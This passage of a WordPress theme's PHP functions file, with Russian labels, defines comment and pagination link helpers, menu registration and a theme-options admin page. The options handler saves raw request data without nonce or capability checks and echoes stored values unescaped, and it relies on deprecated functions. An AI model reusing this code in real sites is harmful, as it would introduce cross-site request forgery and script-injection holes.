		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Подвал", "Подвал", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' - настройки сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
